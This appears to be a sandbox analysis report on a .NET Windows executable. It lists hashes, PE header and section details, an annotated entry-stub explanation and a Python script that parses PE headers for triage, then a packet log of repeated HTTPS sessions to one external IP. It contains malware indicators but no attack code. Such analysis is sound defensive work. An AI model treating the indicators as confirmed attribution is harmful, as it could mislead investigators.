                          • Win32 Executable (generic) a (10002005/4) 49.78%
                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                          • Generic Win/DOS Executable (2004/3) 0.01%
                          • DOS Executable Generic (2002/1) 0.01%
                          File name:ubes6SC7Vd.exe
                          File size:1'972'736 bytes
                          MD5:7ddeccf7c147ea2b90426aeb43277096
                          SHA1:a350f7403f25add29a464491d37f56b5381d4a73
                          SHA256:f8880a50a9423afac856607f3a7a9759ce580fd71e8d92d480e6ec32a52378cb
                          SHA512:2b0f23fdc66cfe90c329474669109320694107f140e5d3b95338833211b4c6fa58a627583babd256fb045444f609020ce544c2a3c14e5d85c46ee76bc71ca7af
                          SSDEEP:24576:Bp9JSZzPtEAPq07VFEJPPwLQk5V4yHEpfm:BpnSjEaRCVwd5Cykp
                          TLSH:BC9509257A4A99ADC09AC4708346C6725A713CCA1B35B9FF44C49E7B3E79AF41F3C218
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x"................0..l..........>.... ........@.. ....................................`................................
                          Icon Hash:116d693231694461
                          Entrypoint:0x5c8a3e
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0x95B82278 [Fri Aug 6 14:23:52 2049 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                          Instruction
                           jmp dword ptr [00402000h]     ; 0x402000 = image base 0x400000 + IAT RVA 0x2000, the single IAT slot holding mscoree!_CorExeMain: the standard .NET native entry stub
                           add byte ptr [eax], al        ; repeated 97 times: the listing runs on into zero bytes after the 6-byte stub, and 00 00 decodes as this instruction; it is padding, not code
                           Name                                 | Virtual Address | Virtual Size | Is in Section
                           IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
                           IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x1c89e4        | 0x57         | .text
                           IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x1ca000        | 0x1a948      | .rsrc
                           IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
                           IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
                           IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x1e6000        | 0xc          | .reloc
                           IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
                           IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
                           IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
                           IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
                           IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
                           IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
                           IMAGE_DIRECTORY_ENTRY_IAT            | 0x2000          | 0x8          | .text
                           IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
                           IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008          | 0x48         | .text
                           IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
                           Name   | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity    | File Type | Entropy             | Characteristics
                           .text  | 0x2000          | 0x1c6a44     | 0x1c6c00 | e745c178efd6d368b03cd11d49e185b9 | False    | 0.3997436993196811 | data      | 6.279017309047847   | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                           .rsrc  | 0x1ca000        | 0x1a948      | 0x1aa00  | 9d72115ed23fac7381916237372aa66e | False    | 0.1363519659624413 | data      | 2.757367311658207   | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                           .reloc | 0x1e6000        | 0xc          | 0x200    | e95a990cce7a0da8236e72229210d6cc | False    | 0.044921875        | data      | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                           Name          | RVA      | Size    | Type                                                                                             | Language | Country | ZLIB Complexity
                           RT_ICON       | 0x1ca220 | 0x1bf8  | PNG image data, 256 x 256, 8-bit gray+alpha, non-interlaced                                      |          |         | 0.9699720670391061
                           RT_ICON       | 0x1cbe18 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/m |          |         | 0.05360522891281202
                           RT_ICON       | 0x1dc640 | 0x4228  | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3779 x 3779 px/m  |          |         | 0.08585262163438828
                           RT_ICON       | 0x1e0868 | 0x25a8  | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m    |          |         | 0.10715767634854771
                           RT_ICON       | 0x1e2e10 | 0x10a8  | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m    |          |         | 0.14047842401500937
                           RT_ICON       | 0x1e3eb8 | 0x468   | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m    |          |         | 0.225177304964539
                           RT_GROUP_ICON | 0x1e4320 | 0x5a    | data                                                                                             |          |         | 0.7333333333333333
                           RT_VERSION    | 0x1e437c | 0x3e0   | data                                                                                             |          |         | 0.42439516129032256
                           RT_MANIFEST   | 0x1e475c | 0x1ea   | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                |          |         | 0.5489795918367347
                           DLL         | Import
                           mscoree.dll | _CorExeMain
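How the static fields above fit together: the entrypoint 0x5c8a3e is the image base 0x400000 plus RVA 0x1c8a3e, which is the last six bytes of .text (0x2000 + 0x1c6a44 = 0x1c8a44), and those six bytes are the `jmp dword ptr [00402000h]` in the disassembly, a jump through the 8-byte IAT at RVA 0x2000 to the only import, mscoree.dll!_CorExeMain. That stub is the same in every .NET executable that imports nothing else, so the Import Hash f34d5f2d4577ed6d9ceec516c1f5a744 is shared by the bulk of the .NET ecosystem and is not a pivot; the logic lives in the CLR metadata behind the COM_DESCRIPTOR directory at RVA 0x2008, and a .NET decompiler, not the native disassembly, is where this sample is read. The timestamp 0x95B82278 (August 2049) postdates the analysis date, which is what "Binary contains a suspicious time stamp" reacts to; the caveat is that deterministic .NET builds store a content hash with the high bit set in that field, so a far-future date is routine for .NET and a weak signal on its own. The Python below is an added example, not code from the report or from the sample, that re-derives these checks from raw headers using only the standard library; build_minimal_pe() is a constructed PE32 image that mirrors the report's layout (image base 0x400000, IAT at 0x2000, CLR header at 0x2008, jmp-through-IAT entry) so the block runs offline, and its sizes and offsets are assumptions, not the sample's.

```python
"""Re-derive the static PE fields listed in the report with the standard library.

Added example, not code from the Joe Sandbox report or the sample. parse_pe32()
reads the headers with struct, section_for_rva() reproduces the "Is in Section"
column, timestamp_check() the suspicious-timestamp logic, and is_dotnet_stub()
verifies the jmp-through-IAT entry every .NET executable carries.
build_minimal_pe() is a constructed image mirroring the report's layout.
"""
import struct
from datetime import datetime, timezone

IMAGE_DIRECTORY_ENTRY_IAT = 12
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14


def parse_pe32(data: bytes) -> dict:
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _, nsect, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 is handled here")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    ndirs = struct.unpack_from("<I", data, opt + 92)[0]
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsect):  # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize,
                         "rawsize": rawsize, "rawptr": rawptr})
    return {"timestamp": timestamp, "entry_rva": entry_rva, "image_base": image_base,
            "dirs": dirs, "sections": sections}


def section_for_rva(pe: dict, rva: int):
    """Section whose virtual range covers rva (the report's 'Is in Section' column)."""
    for s in pe["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return s
    return None


def rva_to_offset(pe: dict, rva: int):
    s = section_for_rva(pe, rva)
    return None if s is None else s["rawptr"] + (rva - s["va"])


def timestamp_check(pe: dict, analysis_time: datetime) -> dict:
    """Flag link timestamps after the analysis date. Deterministic .NET builds store a
    content hash with the high bit set here, so post-2038 dates are common for .NET."""
    ts = pe["timestamp"]
    when = datetime.fromtimestamp(ts, tz=timezone.utc)
    return {"utc": when, "future": when > analysis_time, "hash_like": bool(ts & 0x80000000)}


def is_dotnet_stub(pe: dict, data: bytes) -> bool:
    """True when a CLR header exists and the entrypoint is FF 25 <abs addr>
    (jmp dword ptr [addr]) with addr inside the IAT directory."""
    iat_rva, iat_size = pe["dirs"][IMAGE_DIRECTORY_ENTRY_IAT]
    _, clr_size = pe["dirs"][IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR]
    off = rva_to_offset(pe, pe["entry_rva"])
    if off is None or clr_size == 0 or data[off:off + 2] != b"\xff\x25":
        return False
    target_rva = struct.unpack_from("<I", data, off + 2)[0] - pe["image_base"]
    return iat_rva <= target_rva < iat_rva + iat_size


def triage(data: bytes, analysis_time: datetime) -> dict:
    pe = parse_pe32(data)
    sect = section_for_rva(pe, pe["entry_rva"])
    return {"entrypoint": pe["image_base"] + pe["entry_rva"],
            "entrypoint_section": sect["name"] if sect else None,
            "timestamp": timestamp_check(pe, analysis_time),
            "dotnet_stub": is_dotnet_stub(pe, data)}


def build_minimal_pe(timestamp: int = 0x95B82278) -> bytes:
    """Constructed test image (not the sample): headers in the first 0x200 bytes, one
    .text section at RVA 0x2000 holding the IAT, the CLR header and the entry stub."""
    text_va, text_raw, entry_off = 0x2000, 0x200, 0x50
    text = bytearray(0x200)
    text[entry_off:entry_off + 6] = b"\xff\x25" + struct.pack("<I", 0x400000 + text_va)
    dirs = [(0, 0)] * 16
    dirs[IMAGE_DIRECTORY_ENTRY_IAT] = (text_va, 8)
    dirs[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR] = (text_va + 8, 0x48)
    dos = b"MZ" + bytes(58) + struct.pack("<I", 0x40)                 # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, 224, 0x0102)
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6,
                      0x10B, 48, 0, len(text), 0, 0, text_va + entry_off, text_va, 0,
                      0x400000, 0x1000, 0x200, 4, 0, 0, 0, 4, 0, 0, text_va + 0x1000,
                      0x200, 0, 2, 0x8560, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += struct.pack("<" + "II" * 16, *[v for d in dirs for v in d])
    sect = struct.pack("<8sIIIIIIHHI", b".text", len(text), text_va, len(text),
                       text_raw, 0, 0, 0, 0, 0x60000020)
    return (dos + b"PE\0\0" + coff + opt + sect).ljust(text_raw, b"\0") + bytes(text)


if __name__ == "__main__":
    print(triage(build_minimal_pe(), datetime(2024, 6, 25, tzinfo=timezone.utc)))
```

To run it against a real file, replace build_minimal_pe() with the bytes of the sample; on this sample the same code lands on entrypoint section .text, a 2049 timestamp with the high bit set, and a true .NET stub, which together say "analyse the IL, not the native code".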
                           Timestamp                            | Source Port | Dest Port | Source IP     | Dest IP
                           Jun 25, 2024 14:55:41.428359032 CEST | 49731       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:41.428411007 CEST | 443         | 49731     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:41.428522110 CEST | 49731       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:41.643438101 CEST | 49731       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:41.643466949 CEST | 443         | 49731     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:42.498527050 CEST | 443         | 49731     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:42.498609066 CEST | 49731       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:42.507380962 CEST | 49731       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:42.507405996 CEST | 443         | 49731     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:42.507808924 CEST | 443         | 49731     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:42.561800957 CEST | 49731       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:42.691817999 CEST | 49731       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:42.732507944 CEST | 443         | 49731     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:42.887257099 CEST | 443         | 49731     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:42.887373924 CEST | 443         | 49731     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:42.887448072 CEST | 49731       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:42.970624924 CEST | 49731       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:42.992867947 CEST | 49732       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:42.992950916 CEST | 443         | 49732     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:42.993046045 CEST | 49732       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:42.993362904 CEST | 49732       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:42.993381977 CEST | 443         | 49732     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:43.665404081 CEST | 443         | 49732     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:43.670008898 CEST | 49732       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:43.670048952 CEST | 443         | 49732     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:44.002316952 CEST | 443         | 49732     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:44.002404928 CEST | 443         | 49732     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:44.002511024 CEST | 49732       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:44.059807062 CEST | 49732       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:44.060892105 CEST | 49733       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:44.060937881 CEST | 443         | 49733     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:44.061019897 CEST | 49733       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:44.069515944 CEST | 49733       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:44.069552898 CEST | 443         | 49733     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:44.718449116 CEST | 443         | 49733     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:44.721235037 CEST | 49733       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:44.721265078 CEST | 443         | 49733     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:45.051407099 CEST | 443         | 49733     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:45.051517963 CEST | 443         | 49733     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:45.051589966 CEST | 49733       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:45.053287983 CEST | 49733       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:45.061749935 CEST | 49734       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:45.061789036 CEST | 443         | 49734     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:45.061876059 CEST | 49734       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:45.062649965 CEST | 49734       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:45.062669992 CEST | 443         | 49734     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:45.702471018 CEST | 443         | 49734     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:45.704745054 CEST | 49734       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:45.704771996 CEST | 443         | 49734     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:46.028053999 CEST | 443         | 49734     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:46.028156042 CEST | 443         | 49734     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:46.028219938 CEST | 49734       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:46.028827906 CEST | 49734       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:46.030019999 CEST | 49735       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:46.030059099 CEST | 443         | 49735     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:46.030132055 CEST | 49735       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:46.030471087 CEST | 49735       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:46.030484915 CEST | 443         | 49735     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:46.897473097 CEST | 443         | 49735     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:46.905102968 CEST | 49735       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:46.905138969 CEST | 443         | 49735     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:47.275259018 CEST | 443         | 49735     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:47.275373936 CEST | 443         | 49735     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:47.275527000 CEST | 49735       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:47.276228905 CEST | 49735       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:47.277180910 CEST | 49736       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:47.277215958 CEST | 443         | 49736     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:47.277337074 CEST | 49736       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:47.277513027 CEST | 49736       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:47.277529955 CEST | 443         | 49736     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:48.307568073 CEST | 443         | 49736     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:48.308777094 CEST | 49736       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:48.308819056 CEST | 443         | 49736     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:48.645020008 CEST | 443         | 49736     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:48.645257950 CEST | 443         | 49736     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:48.645361900 CEST | 49736       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:48.645874023 CEST | 49736       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:48.647257090 CEST | 49737       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:48.647315025 CEST | 443         | 49737     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:48.647406101 CEST | 49737       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:48.647675037 CEST | 49737       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:48.647684097 CEST | 443         | 49737     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:49.677148104 CEST | 443         | 49737     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:49.678584099 CEST | 49737       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:49.678613901 CEST | 443         | 49737     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:50.204684973 CEST | 443         | 49737     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:50.204885006 CEST | 443         | 49737     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:50.204952955 CEST | 49737       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:50.205748081 CEST | 49737       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:50.207185984 CEST | 49738       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:50.207215071 CEST | 443         | 49738     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:50.207288980 CEST | 49738       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:50.207607985 CEST | 49738       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:50.207622051 CEST | 443         | 49738     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:50.870676041 CEST | 443         | 49738     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:50.872936964 CEST | 49738       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:50.872975111 CEST | 443         | 49738     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:51.200402021 CEST | 443         | 49738     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:51.200525045 CEST | 443         | 49738     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:51.200573921 CEST | 49738       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:51.201174021 CEST | 49738       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:51.202182055 CEST | 49739       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:51.202229023 CEST | 443         | 49739     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:51.202322006 CEST | 49739       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:51.202666998 CEST | 49739       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:51.202683926 CEST | 443         | 49739     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:51.853219032 CEST | 443         | 49739     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:51.854948997 CEST | 49739       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:51.854989052 CEST | 443         | 49739     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:52.186855078 CEST | 443         | 49739     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:52.187071085 CEST | 443         | 49739     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:52.187175035 CEST | 49739       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:52.187690973 CEST | 49739       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:56.276913881 CEST | 49745       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:56.276962042 CEST | 443         | 49745     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:56.277215004 CEST | 49745       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:56.284008980 CEST | 49745       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:56.284027100 CEST | 443         | 49745     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:56.980242014 CEST | 443         | 49745     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:56.980348110 CEST | 49745       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:57.004913092 CEST | 49745       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:57.004929066 CEST | 443         | 49745     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:57.005474091 CEST | 443         | 49745     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:57.046207905 CEST | 49745       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:57.231684923 CEST | 49745       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:57.272504091 CEST | 443         | 49745     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:57.426143885 CEST | 443         | 49745     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:57.426261902 CEST | 443         | 49745     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:57.426317930 CEST | 49745       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:57.430488110 CEST | 49745       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:57.431529045 CEST | 49747       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:57.431567907 CEST | 443         | 49747     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:57.431639910 CEST | 49747       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:57.431907892 CEST | 49747       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:57.431920052 CEST | 443         | 49747     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:58.085095882 CEST | 443         | 49747     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:58.093996048 CEST | 49747       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:58.094016075 CEST | 443         | 49747     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:58.419496059 CEST | 443         | 49747     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:58.419586897 CEST | 443         | 49747     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:58.419708014 CEST | 49747       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:58.420259953 CEST | 49747       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:58.421474934 CEST | 49748       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:58.421525955 CEST | 443         | 49748     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:58.421627045 CEST | 49748       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:58.422017097 CEST | 49748       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:58.422029018 CEST | 443         | 49748     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:59.085645914 CEST | 443         | 49748     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:59.087605000 CEST | 49748       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:59.087641001 CEST | 443         | 49748     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:59.418937922 CEST | 443         | 49748     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:59.419034004 CEST | 443         | 49748     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:59.419152975 CEST | 49748       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:59.423299074 CEST | 49748       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:59.427670002 CEST | 49749       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:59.427719116 CEST | 443         | 49749     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:55:59.427800894 CEST | 49749       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:59.431621075 CEST | 49749       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:55:59.431653023 CEST | 443         | 49749     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:56:00.076240063 CEST | 443         | 49749     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:56:00.077636003 CEST | 49749       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:56:00.077656031 CEST | 443         | 49749     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:56:00.404958010 CEST | 443         | 49749     | 195.201.57.90 | 192.168.2.4
